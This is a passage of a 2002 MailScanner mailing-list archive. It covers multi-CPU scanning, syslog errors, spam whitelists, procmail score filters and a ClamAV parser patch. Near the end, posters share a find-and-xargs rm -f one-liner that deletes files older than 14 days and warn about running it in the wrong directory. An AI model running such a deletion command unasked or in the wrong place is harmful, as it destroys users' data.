hours then die and are restarted by the master. > > You all probably figured out my level of expertice =( > > but this is something I relly need to understand. > > My guess from the begining was thats with 2 cpu MS would be > > able to scan faster. But know Im not sure If I should spend the > > extra money. > > Does 2 cpu demands extra config or will it handle it by it self? > > >You won't gain much advantage as far as MS is concerned from a >multi-processor box. However, MS isn't the only thing active on a system >that also happens to be running MS, so the other processor will get used >but things like the sendmail and other tasks the system runs. My >personal recommendation is to go with a multi-processor if you have a >significant mail load. >-- >The instructions said to use Windows 98 or better, so I installed >RedHat. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From lbergman at abi.tconline.net Wed Sep 18 15:29:07 2002 From: lbergman at abi.tconline.net (Lewis Bergman) Date: Thu Jan 12 21:15:42 2006 Subject: BOOTLOG.EXE Message-ID: <200209180929.07091.lbergman@abi.tconline.net> I am guessing the subject is an exploit for XP. I received a mail from someone I don't know saying that they hoped I liked the "patch". f-prot didn't catch it so I entered it in my filename rules. Has anyone else seen this or am I just paranoid? -- Lewis Bergman Texas Communications 4309 Maple St. Abilene, TX 79602-8044 915-695-6962 ext 115 From andersan at LTKALMAR.SE Wed Sep 18 15:41:54 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:42 2006 Subject: SV: SV: SV: SV: Multiple cpu? Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB38@lkl22.ltkalmar.se> Thanks for all the explanation regarding this strange world Like you all said, there is more then MS that will like the 2 cpu so I'll just go and ask the boss for some extra cash =) Kind regards /Anders > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 18 september 2002 16:23 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: SV: SV: SV: Multiple cpu? > > > At 14:48 18/09/2002, you wrote: > >Hmm, now I feel stupid but I have to ask. > >Whats the differense between instances and child processes? > > 1 instance = 1 child process in MailScanner v4. > > >My guess from the begining was thats with 2 cpu MS would be > >able to scan faster. But know Im not sure If I should spend the > >extra money. > > Version 4 will definitely scan faster with 2 CPU's than 1. > > >Does 2 cpu demands extra config or will it handle it by it self? > > No extra config required. > > > >Kind regards > > > >/Anders > > > > > > > -----Ursprungligt meddelande----- > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > Skickat: den 18 september 2002 15:33 > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > ?mne: Re: SV: SV: Multiple cpu? > > > > > > > > > At 13:00 18/09/2002, you wrote: > > > >Just so Im sure of what you mean. > > > >I wont run multiple instances on the mailserver, I > > > >just want to be able to use the extra process speed from 2 cpu's? > > > > > > You can just set the number of child processes you want to > > > run. This will > > > then use all the CPU's it can get. My first speed test was > > > done with 12 > > > child processes on a 2 CPU system. > > > > > > > > > >/Anders > > > > > > > > > -----Ursprungligt meddelande----- > > > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > > > Skickat: den 18 september 2002 13:44 > > > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > > > ?mne: Re: SV: Multiple cpu? > > > > > > > > > > > > > > > At 11:35 18/09/2002, you wrote: > > > > > >On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > > > > > > > > > > > > > Thanks, then I order more horse power to the comp > > > > > > > and do an upgrade when v.4 is here. > > > > > > > > > > > >I don't recall if version 4 is supposed to be multithreaded > > > > > or not, but > > > > > >the ability to run multiple instances of mailscanner, or > > > > > even just two, > > > > > >will be a Very Good Thing. Probably a lot more valuable than > > > > > >multithreadedness. My guess is it's more of an IO and > > > > > scheduling thing > > > > > >than CPU horsepower. > > > > > > > > > > It's not strictly multi-threaded but it is multi-process. > > > > > -- > > > > > Julian Field Teaching Systems Manager > > > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > > > Computer Science > > > > > Tel. 023 8059 2817 University of Southampton > > > > > Southampton SO17 1BJ > > > > > > > > > > > -- > > > Julian Field Teaching Systems Manager > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > Computer Science > > > Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From paulo at TURNPIKE.COM Wed Sep 18 15:45:23 2002 From: paulo at TURNPIKE.COM (Dave English) Date: Thu Jan 12 21:15:42 2006 Subject: Problem with Sys::Syslog Message-ID: When I try to run my mailscanner on Solaris 8 with Perl 5.6.1, it fails with this message: # ./check_mailscanner Starting virus scanner... connect: No such file or directory (SOCK_DGRAM after trying SOCK_STREAM) at /opt/mailscanner/bin/logger.pl line 75 # It is something to do with the Sys::Syslog module. There are a few Google hits, but for no one application & coming to no one conclusion. I cannot find any sign of it logging anything anywhere, but that may not be so surprising - it may not be getting that far. Does anyone have any idea where I should start? Regards -- Dave English, Client Software Development, Thus PLC, Dorking Business Park, DORKING, Surrey, UK. RH4 1HJ http://www.thus.net -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 177 bytes Desc: not available Url : http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020918/2290ab19/signature.bin From billa at STERLING.NET Wed Sep 18 16:09:09 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:42 2006 Subject: Best practices for white and black lists? In-Reply-To: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> Message-ID: What is the auto whitelist feature of spamassassin and how does it work? I notice that it is a feature of mailscanner to support it? Thanks again. > -----Original Message----- > From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On > Behalf Of Julian Field > Sent: Tuesday, September 17, 2002 2:58 PM > To: MAILSCANNER@JISCMAIL.AC.UK > Subject: Re: Best practices for white and black lists? > > > Sorry to spout on about the new version of MailScanner again, rather than > the version you've got, but this should be simple. You will be able to > specify a set of rules for calculating the value "Is It Definitely Spam" > (addresses contained in the ruleset build up your blacklist), and > a set for > calculating the value "Is It Definitely Not Spam" (addresses contained in > the ruleset build up your whitelist). > > Currently there is a "spam.whitelist.conf" in which you can place all your > whitelist addresses. There is currently no blacklist, but you can > easily do > that in sendmail anyway. > > At 16:15 17/09/2002, you wrote: > >I am trying to figure our the best method for creating white and black > >lists. It seems like there are several places to put these entries > >mailscanner/spamassasin/or sendmail. > > > >The first scenario is mail that did not get tagged as spam but > should have. > >Should I put in the ip in the access sendmail file or is ther a > black list > >for mailscanner? Is there a simpler way? > > > >The second scenario is something get's reported as spam but > should not. Can > >I use the auto whitelist feature? If so, how does it work, I > couldnt find > >any information on configuratio or use? What is the best way? > > > >There probably is a million ways to cut it, but I am looking for best > >practices that seem to work for people. My goal is to limit the > amount of > >management and using automated features would be great. Thanks. > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From mailscanner at ecs.soton.ac.uk Wed Sep 18 16:14:39 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: Problem with Sys::Syslog In-Reply-To: Message-ID: <5.1.0.14.2.20020918161232.02c70560@imap.ecs.soton.ac.uk> At 15:45 18/09/2002, you wrote: >When I try to run my mailscanner on Solaris 8 with Perl 5.6.1, it fails >with this message: > ># ./check_mailscanner >Starting virus scanner... >connect: No such file or directory (SOCK_DGRAM after trying SOCK_STREAM) >at /opt/mailscanner/bin/logger.pl line 75 ># > >It is something to do with the Sys::Syslog module. > >There are a few Google hits, but for no one application & coming to no one >conclusion. > >I cannot find any sign of it logging anything anywhere, but that may not >be so surprising - it may not be getting that far. > >Does anyone have any idea where I should start? Start by getting h2ph to run, to ensure all your .ph files are up to date (and exist). cd /usr/include; h2ph -r -l . though you will probably have to find your copy of h2ph first and put the full pathname in the command above. Don't forget the "." on the end of the command. If that doesn't fix it, then perl -MCPAN -e shell install Sys::Syslog and see if it finds a newer Syslog module for you. If it starts upgrading perl (loads and loads of cc commands) then stop it doing it. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From rabellino at DI.UNITO.IT Wed Sep 18 16:09:21 2002 From: rabellino at DI.UNITO.IT (Rabellino Sergio) Date: Thu Jan 12 21:15:42 2006 Subject: Problem with Sys::Syslog References: Message-ID: <3D889721.D2F0D2A0@di.unito.it> Dave English wrote: > > When I try to run my mailscanner on Solaris 8 with Perl 5.6.1, it fails > with this message: > > # ./check_mailscanner > Starting virus scanner... > connect: No such file or directory (SOCK_DGRAM after trying SOCK_STREAM) > at /opt/mailscanner/bin/logger.pl line 75 > # > > It is something to do with the Sys::Syslog module. > > There are a few Google hits, but for no one application & coming to no > one conclusion. > > I cannot find any sign of it logging anything anywhere, but that may not > be so surprising - it may not be getting that far. > > Does anyone have any idea where I should start? > Try to change "unix" to "inet" on line 44 inside logger.pl It's an old problem of solaris syslog, where is not defined the path for the syslog unix socket (unused for a normal solaris installation...as I know...) Bye. -- Dott. Sergio Rabellino Technical Staff Department of Computer Science University of Torino (Italy) Member of the Internet Society http://www.di.unito.it/~rabser Tel. +39-0116706701 Fax. +39-011751603 From mailscanner at ecs.soton.ac.uk Wed Sep 18 16:17:55 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: Best practices for white and black lists? In-Reply-To: References: <5.1.0.14.2.20020917225446.03aa9bb0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020918161658.02c532d0@imap.ecs.soton.ac.uk> At 16:09 18/09/2002, you wrote: >What is the auto whitelist feature of spamassassin and how does it work? I >notice that it is a feature of mailscanner to support it? Thanks again. I'm not sure quite how it works, but the idea is that if you get a certain number of non-spam messages from an address, it decides that address is definitely not a spammer and adds that address to the whitelist so that no mail from that address will ever be marked as spam. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From sevans at FOUNDATION.SDSU.EDU Wed Sep 18 16:24:20 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:42 2006 Subject: Best practices for white and black lists? Message-ID: <6214C3F9233D764C9E7029396C3550153314C4@mail.foundation.sdsu.edu> It's a lot more sophisticated/complicated than that, but that is the end result. It's also based on who you send messages to. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Wednesday, September 18, 2002 8:18 AM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: Best practices for white and black lists? At 16:09 18/09/2002, you wrote: >What is the auto whitelist feature of spamassassin and how does it >work? I notice that it is a feature of mailscanner to support it? >Thanks again. I'm not sure quite how it works, but the idea is that if you get a certain number of non-spam messages from an address, it decides that address is definitely not a spammer and adds that address to the whitelist so that no mail from that address will ever be marked as spam. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From jim at ENTROPHY-FREE.NET Wed Sep 18 16:35:41 2002 From: jim at ENTROPHY-FREE.NET (Jim Levie) Date: Thu Jan 12 21:15:42 2006 Subject: SV: SV: SV: Multiple cpu? In-Reply-To: <5.1.0.14.2.20020918152359.02d045a8@imap.ecs.soton.ac.uk> References: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> <5.1.0.14.2.20020918152359.02d045a8@imap.ecs.soton.ac.uk> Message-ID: <1032363342.2213.28.camel@wilowisp.dynetics.com> On Wed, 2002-09-18 at 09:25, Julian Field wrote: > At 15:11 18/09/2002, you wrote: > > Child processes do their work and exit so that they don't needless > >consume resources. At least that's what I assume Julian has done. > > They run for a few hours then die and are restarted by the master. > While that's not the classical master/child scenario it probably does make more sense for MailScanner. The startup cost of a child in this case is not insignificant. So it does make more sense to start up the children and leave them running. > > > > You all probably figured out my level of expertice =( > > > but this is something I relly need to understand. > > > My guess from the begining was thats with 2 cpu MS would be > > > able to scan faster. But know Im not sure If I should spend the > > > extra money. > > > Does 2 cpu demands extra config or will it handle it by it self? > > > > >You won't gain much advantage as far as MS is concerned from a > >multi-processor box. However, MS isn't the only thing active on a system > >that also happens to be running MS, so the other processor will get used > >but things like the sendmail and other tasks the system runs. My > >personal recommendation is to go with a multi-processor if you have a > >significant mail load. Now that I read what I had written above I think I should clarify what I meant. The current V3 code won't take full advantage of a multi-processor unless you arrange for multiple instances of MS. The system as a whole will take advantage of multiple CPU's, so a multi-processor box is a "good thing" if you have significant load. And it's the expected load that really determines the need for a dual processor box. One other thing to consider... There's a fair bit of IO in something like MS. So it does make since to have more than one MS process active on a uni-processor box, providing you don't run the system out of memory. Very informal testing on my part indicates that 2 or 3 instances of MS seem to be the "sweet spot', depending somewhat on the disk I/O speed and the content of the mail stream. There's enough idle time from disk I/O that a second or third MS can take advantage of that idle time for compute work. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= The instructions said to use Windows 98 or better, so I installed RedHat Jim Levie email: jim@entrophy-free.net From tyler at beloit.edu Wed Sep 18 17:09:37 2002 From: tyler at beloit.edu (Tim Tyler) Date: Thu Jan 12 21:15:42 2006 Subject: dropping spam messages? Message-ID: <200209181609.LAA14974@beloit.edu> Mailscanner, I am using Mailscanner for virus protection along with Sophos and it works wonderfully for the most part. I had been ignoring spam until now. I usually just tell end users to delete it. However, recently it has been becoming more and more annoying and to the point of DOSing our smtp server. Can the latest version of Mailsanner have spam email be automatically deleted like virus email and have a message sent back to the sender indicating that the email was not delivered because it was identified as spam, etc.? Any thoughts on how often false positives for spam are identified? Note: I am not a fan of tagging email as spam and letting end users filter it. I would rather stop it altogether (as much as possible). -- Tim Tyler Network Manager - Beloit College tyler@beloit.edu From sean at NISD.NET Wed Sep 18 19:45:41 2002 From: sean at NISD.NET (Sean Embry) Date: Thu Jan 12 21:15:42 2006 Subject: dropping spam messages? Message-ID: I've seen this quite a bit. I'm also seeing more and more "Broken Pipe" messages, and I suspect that's when the spammer drops the connection before the 5.7.1 gets back. Can anyone gently me with a clue stick on the "broken pipe" messages? I've loaded IPTABLES, and in the process of writing shell code to run every hour or so to parse out the IP lines in the access file and apply a REJECT --reject-with icmp-net-prohibited rule for offenders. >>> Tim Tyler 09/18/02 11:09AM >>> Mailscanner, I am using Mailscanner for virus protection along with Sophos and it works wonderfully for the most part. I had been ignoring spam until now. I usually just tell end users to delete it. However, recently it has been becoming more and more annoying and to the point of DOSing our smtp server. Can the latest version of Mailsanner have spam email be automatically deleted like virus email and have a message sent back to the sender indicating that the email was not delivered because it was identified as spam, etc.? Any thoughts on how often false positives for spam are identified? Note: I am not a fan of tagging email as spam and letting end users filter it. I would rather stop it altogether (as much as possible). -- Tim Tyler Network Manager - Beloit College tyler@beloit.edu From Janssen at RZ.UNI-FRANKFURT.DE Wed Sep 18 20:43:01 2002 From: Janssen at RZ.UNI-FRANKFURT.DE (Michael Janssen) Date: Thu Jan 12 21:15:42 2006 Subject: end user - procmail filter In-Reply-To: Message-ID: > > ### SA-Scoring > > :0 > > * ^X-MailScanner-SpamCheck: SpamAssassin .score=\/[^\., ]* > > * ? test ${MATCH} -ge 15 > > $MAILDIR/spam/high > > > > filling the score (everything after \/ till dot, comma, space) to $MATCH > > and then process with (bash-builtin) test. "?" let procmail take the > > return value of the given programm as a test. > > > > since "test" doesn't handel floats the regexp has to cut the score to int. > > I haven't had a chance to experiment with this yet, but just off the top > of my head might it be possible to just remove the decimal point somehow > and deal with the larger two digit integer rather than just truncating it? > > Or would that be unnecessary added value? (nonetheless, it would be a cool > thing to know how to do, for us types that are entertained by such things) > > Eric > yes! There is a way to use fine tweaked filters: # abc=`echo "4.9" | sed s/\\\\.//`; test $abc -gt 48 && echo yes yes # abc=`echo "4.7" | sed s/\\\\.//`; test $abc -gt 48 && echo yes # BUT this is only the first approach, wich will fails when the score has no dot. Therefore we need a sed-subtitution which padded 0 to e.g. 4 or 42: sed s/^[1-9][0-9]\\?$/'&'0/ --> if string is one or two decimals (without dot) then take the match and padd 0. Otherwise leave string untouched. the complete pipe: # echo "4" | sed s/^[1-9][0-9]\\?$/'&'0/ | sed s/\\.// 40 # echo "4.2" | sed s/^[1-9][0-9]\\?$/'&'0/ | sed s/\\.// 42 # echo "42" | sed s/^[1-9][0-9]\\?$/'&'0/ | sed s/\\.// 420 # echo "42.6" | sed s/^[1-9][0-9]\\?$/'&'0/ | sed s/\\.// 426 the procmail-repipe is (dubbel escaped): * ? abc=`echo $MATCH | sed s/^[1-9][0-9]\\\\?$/"'&'"0/ | sed s/\\\\.//`; \ test $abc -gt 4.1 keep care: no spaces in $MATCH allowed Another way might be to figure out how "bc" works, wich can handel floats (man bc). Michael By the way, $MATCH is suggested on this side: http://www.uwasa.fi/~ts/info/proctips.html From tyler at beloit.edu Wed Sep 18 21:13:53 2002 From: tyler at beloit.edu (Tim Tyler) Date: Thu Jan 12 21:15:42 2006 Subject: syslog not defined? Message-ID: <200209182013.PAA30784@beloit.edu> Mailscanner, I tried to upgrade from mailscanner 2.6 to 3.22.14 but I got this error when starting it up: # /var/spool/mailscanner/bin/check_mailscanner Starting virus scanner... Your vendor has not defined the Sys::Syslog macro _PATH_LOG at /usr/local/lib/perl5/5.6.0/aix/Sys/Syslog.pm line 277. I am running AIX4.3.3. Any suggestions for resolving this? Note: I didn't get this error with 2.6. -- Tim Tyler Network Manager - Beloit College tyler@beloit.edu From Janssen at RZ.UNI-FRANKFURT.DE Wed Sep 18 21:33:22 2002 From: Janssen at RZ.UNI-FRANKFURT.DE (Michael Janssen) Date: Thu Jan 12 21:15:42 2006 Subject: end user - procmail filter In-Reply-To: Message-ID: corrections: > the procmail-repipe is (dubbel escaped): > * ? abc=`echo $MATCH | sed s/^[1-9][0-9]\\\\?$/"'&'"0/ | sed s/\\\\.//`; \ > test $abc -gt 4.1 test $abc -gt 41 (obviously) s/^[1-9][0-9]*$/ runs even with AIX (and gets spam with score -gt 99.9 ;) i'm not sure wether '&' or "'&'" --> better keep it simple :-) Michael From adrian at SMOP.CO.UK Wed Sep 18 22:48:34 2002 From: adrian at SMOP.CO.UK (Adrian Bridgett) Date: Thu Jan 12 21:15:42 2006 Subject: Rejected posting to MAILSCANNER@JISCMAIL.AC.UK In-Reply-To: References: Message-ID: <20020918214834.GB13836@smop.co.uk> Grrr. This is my fourth attempt to post. I've followed the various instructions, however I'm sure it said one link it sent when I clicked on it "does not correspond to any pending command" - the subscribe command IIRC. I just one to post one message, please! :-) Adrian On Wed, Sep 18, 2002 at 22:46:22 +0100 (+0000), L-Soft list server at JISCMAIL (1.8e) wrote: > You are not authorized to send mail to the MAILSCANNER list from your > adrian@SMOP.CO.UK account. You might be authorized to send to the list from > another of your accounts, or perhaps when using another mail program which > generates slightly different addresses, but LISTSERV has no way to associate > this other account or address with yours. If you need assistance or if you have > any question regarding the policy of the MAILSCANNER list, please contact the > list owners: MAILSCANNER-request@JISCMAIL.AC.UK. > Subject: clamav support for mailscanner (patch) > From: Adrian Bridgett > Date: Wed, 18 Sep 2002 22:45:59 +0100 > To: mailscanner@jiscmail.ac.uk > > Here's a basic parser for clamav (clamav.elektrapro.com). I've unit tested > it with zip archives only (no rar archives etc). Maybe "TryOneCommercial" > should be renamed ;-) > > I havn't actually started using mailscanner yet (I'm about to swap from > amavisd-new having seen the source code ), so this is definitely not > tested in production. > > Hope this is useful for someone - patch attached is against 3.22.13-1 > (debian package), but should apply pretty cleanly (just an offset problem > from the original which was against 3.13). > > I must say, I'm not a great fan of the InitParser/ProcessOutput stuff - any > particular reason why it was done this way (calling it a line at a time - > you could pass it a file desciptor)? > > Adrian > > Email: adrian@smop.co.uk > Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers > Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org > diff -ru 3.22.orig/etc/mailscanner/mailscanner.conf 3.22/etc/mailscanner/mailscanner.conf > --- 3.22.orig/etc/mailscanner/mailscanner.conf 2002-09-11 23:51:48.000000000 +0100 > +++ 3.22/etc/mailscanner/mailscanner.conf 2002-09-18 22:22:37.000000000 +0100 > @@ -119,6 +119,7 @@ > # panda from www.pandasoftware.com, or > # rav from www.ravantivirus.com, or > # antivir from www.antivir.de, or > +# clamav from clamav.elektrapro.com or > # none > # > # Note: If you want to use multiple virus scanners, then this should be a > Only in 3.22/etc/mailscanner: mailscanner.conf~ > Only in 3.22/etc/mailscanner/wrapper: clamavwrapper > diff -ru 3.22.orig/usr/share/mailscanner/sweep.pl 3.22/usr/share/mailscanner/sweep.pl > --- 3.22.orig/usr/share/mailscanner/sweep.pl 2002-09-10 09:01:02.000000000 +0100 > +++ 3.22/usr/share/mailscanner/sweep.pl 2002-09-18 22:21:41.000000000 +0100 > @@ -173,6 +173,16 @@ > SupportScanning => $S_UNSUPPORTED, > SupportDisinfect => $S_UNSUPPORTED, > }, > + clamav => { > + Lock => 'ClamAV.lock', > + CommonOptions => '-r --disable-summary --stdout', > + DisinfectOptions => '', > + ScanOptions => '', > + InitParser => \&InitClamAVParser, > + ProcessOutput => \&ProcessClamAVOutput, > + SupportScanning => $S_BETA, > + SupportDisinfect => $S_NONE, > + }, > "none" => { > Lock => 'NoneBusy.lock', > CommonOptions => '', > @@ -507,6 +517,13 @@ > ; > } > > +# Initialise any state variables the ClamAV output parser uses > +my ($clamav_archive); > +sub InitClamAVParser { > + $clamav_archive = ""; > +} > + > + > # These functions must be called with, in order: > # * The line of output from the scanner > # * A reference to the hash containing problem details > @@ -1022,6 +1039,63 @@ > return 0; > } > > +# Process ClamAV (v0.22) output > +sub ProcessClamAVOutput { > + my($line, $infections, $types, $BaseDir) = @_; > + > + if ($line =~ /^ERROR:/ or $line =~ /^execv\(p\):/) > + { > + chomp $line; > + Log::WarnLog($line); > + return 0; > + } > + > + # clamscan currently stops as soon as one virus is found > + # therefore there is little point saying which part > + # it's still a start mind! > + > + # Only tested with --unzip since only windows boxes get viruses ;-) > + > + if (/^Archive: (.*)$/) > + { > + $clamav_archive = $1; > + return 0; > + } > + return 0 if /^ /; # " inflating", " deflating.." from --unzip > + if ($clamav_archive && /^$clamav_archive:/) > + { > + $clamav_archive = ""; > + return 0; > + } > + > + return 0 if /OK$/; > + > + if (/^(.*?): (.*) FOUND$/) > + { > + my ($id, $part, $virus); > + $virus = $2; > + if ($clamav_archive) > + { > + $id = $clamav_archive; > + ($part = $1) =~ s/^.*\///; # get basename of file > + } > + else > + { > + $id = $1; > + $part = ""; > + } > + $id =~ s/$BaseDir\///; > + > + $infections->{"$id"}{"$part"} .= "contains $virus\n"; > + $types->{"$id"}{"$part"} .= "v"; > + return 1; > + } > + > + chomp $line; > + Log::WarnLog("ProcessClamAVOutput: unrecognised line \"$line\""); > + return 0; > +} > + > > sub CallOwnChecking { > my($BaseDir, $mime, $infections, $inftypes) = @_; Email: adrian@smop.co.uk Windows NT - Unix in beta-testing. GPG/PGP keys available on public key servers Debian GNU/Linux -*- By professionals for professionals -*- www.debian.org From mailscanner at ecs.soton.ac.uk Wed Sep 18 22:27:59 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: syslog not defined? In-Reply-To: <200209182013.PAA30784@beloit.edu> Message-ID: <5.1.0.14.2.20020918222639.023d2d68@imap.ecs.soton.ac.uk> Can you check that, after it printed this error, MailScanner isn't actually running? MailScanner now tries to start the syslogging without needing a UDP socket open to your syslogd, but backs off and tries the old way if that failed. So it's quite possible that this error is harmless and MailScanner is still running after it prints this error. At 21:13 18/09/2002, you wrote: >Mailscanner, > I tried to upgrade from mailscanner 2.6 to 3.22.14 but I got this error >when starting it up: > ># /var/spool/mailscanner/bin/check_mailscanner >Starting virus scanner... >Your vendor has not defined the Sys::Syslog macro _PATH_LOG at >/usr/local/lib/perl5/5.6.0/aix/Sys/Syslog.pm line 277. > >I am running AIX4.3.3. > >Any suggestions for resolving this? Note: I didn't get this error with 2.6. > >-- >Tim Tyler >Network Manager - Beloit College >tyler@beloit.edu -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Wed Sep 18 22:28:37 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:42 2006 Subject: end user - procmail filter In-Reply-To: References: Message-ID: <5.1.0.14.2.20020918222810.02429b98@imap.ecs.soton.ac.uk> Boy, are you guys going to be glad of the "Spam Score = yes" option in v4 :-) At 21:33 18/09/2002, you wrote: >corrections: > > > the procmail-repipe is (dubbel escaped): > > * ? abc=`echo $MATCH | sed s/^[1-9][0-9]\\\\?$/"'&'"0/ | sed s/\\\\.//`; \ > > test $abc -gt 4.1 > >test $abc -gt 41 (obviously) > >s/^[1-9][0-9]*$/ runs even with AIX (and gets spam with score -gt 99.9 ;) > >i'm not sure wether '&' or "'&'" > >--> better keep it simple :-) > >Michael -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From email at ace.net.au Thu Sep 19 00:08:09 2002 From: email at ace.net.au (Peter Nitschke) Date: Thu Jan 12 21:15:42 2006 Subject: Feature, maybe misfeature In-Reply-To: <1032207021.28021.35.camel@dbeauchemin.si.usherb.ca> References: <20020914003637.GK12747@hoiho.nz.lemon-computing.com> <5.1.0.14.2.20020916200214.0235a0d0@imap.ecs.soton.ac.uk> <1032207021.28021.35.camel@dbeauchemin.si.usherb.ca> Message-ID: <200209190838090132.1697DBC2@smtp1.ace.net.au> >> As no-one seems to have posted anything, how about a line like this which >> will delete all files under the current directory more than 14 days old: >> find . -type f -mtime +14 -print | xargs rm -f > >I'd recommend using: > find . -type f -mtime +14 -print0 | xargs -0 rm -f > >That way you won't get into trouble if a file name contains spaces or >some other strange character. Find puts a null character at the end of >each file name and xargs expects null-separated arguments. However if you don't specify a directory to run it in, life will get pretty exciting...... Peter From info at BLACKNIGHT-SOLUTIONS.COM Thu Sep 19 01:21:38 2002 From: info at BLACKNIGHT-SOLUTIONS.COM (Blacknight Solutions) Date: Thu Jan 12 21:15:42 2006 Subject: SpamAssassin weirdness? Message-ID: <5.1.1.6.0.20020919021931.00af1550@blacknightsolutions.com> Hi all, maybe this has been covered somewhere already but.... When I upgraded mailscanner and tried to activate the spam filter I got no results.... after playing with the config for a while I decided to reinstall spamassassin and it started working. Is this normal? Or have I missed something? Mr. Michele Neylon Blacknight Solutions - affordable linux hosting http://www.blacknightsolutions.com/ From erich at OLYPEN.COM Thu Sep 19 07:46:24 2002 From: erich at OLYPEN.COM (Eric H) Date: Thu Jan 12 21:15:42 2006 Subject: SV: SV: SV: Multiple cpu? In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB37@lkl22.ltkalmar.se> Message-ID: On Wed, 18 Sep 2002, Anders Andersson, IT wrote: > Hmm, now I feel stupid but I have to ask. > Whats the differense between instances and child processes? Well, a lot of these terms mean just about the same thing. A child process would be another instance of the application, but the sense I was using "instance" was starting two copies of the application myself rather than starting one and having it fork off children. > You all probably figured out my level of expertice =( > but this is something I relly need to understand. > My guess from the begining was thats with 2 cpu MS would be > able to scan faster. But know Im not sure If I should spend the > extra money. > Does 2 cpu demands extra config or will it handle it by it self? If you have a process running which is not multithreaded then the most it can do is hog one CPU in a multiprocessor system. This would leave the other processor(s) either idle or the scheduler will shove any other processes that might be running over to the idle CPU(s). If you are running a single threaded application then you can benefit from running another instance of it on a dual CPU system and sometimes even more than two instances due to IO blocking, scheduling, CPU utilization and the demands of other processes all working out perhaps in your favor, perhaps not. It depends on a lot of things us mere mortals won't ever understand thoroughly, so we just try it and see if it make money. If you are running a multithreaded process then the scheduler can migrate individual threads of that process to other CPUs that might be present and available in the system. But only certain types of applications can benefit from multithreading and I sort of expect that MailScanner isn't one of them because it seems pretty straightforward and linear, grab a message, scan it, modify it and stash it. In fact, I think maybe a majority of applications would not benefit from writing them in a multithreaded model because you've got to have concrete reasons for wanting to thread rather than it just sounding good to the sales lizards. For example, several years ago I was messing around with Bochs, a really neat i386 emulator in C++, which has since been GPLed. I was running Windows 95 in Bochs on a RedHat 4.2 system with dual CPUs, on the 2.0.x kernels which weren't all that great at SMP at the time, but it worked marvelously well. Bochs was not multithreaded so it just hogged one processor and left the other one free to run all the other processes on my system. Something like the Seti at Home or the DES key searching distributed projects would benefit from threading, forking off a bunch of threads to be migrated/scheduled on whatever CPU is available at any given time. I haven't paid much attention to the SMP and threading issues in Linux for a while because, uh, it just works, but I think that when a process creates a thread it's just calling the clone or vfork system call a little differently than spawning children and the resulting thread looks just like any other process and has its own PID in the process table. There're other things in there too, like I think threads can signal each other and do other magic stuff. Like Oddball the tank commander in "Kelly's Heros" said when asked why he wasn't helping with maintenance, "Oh, man, I just ride in 'em. I don't know what makes 'em work". Eric From bill at DISTMIRR.COM Thu Sep 19 13:08:12 2002 From: bill at DISTMIRR.COM (Bill Omer) Date: Thu Jan 12 21:15:42 2006 Subject: problem with queue runner Message-ID: <000601c25fd5$3a245e90$5d751542@billslaptop> I'm running sendmail -q15m, and when I do a ps afx | grep sendmail, I see a 2nd sendmail process, but it only shows the 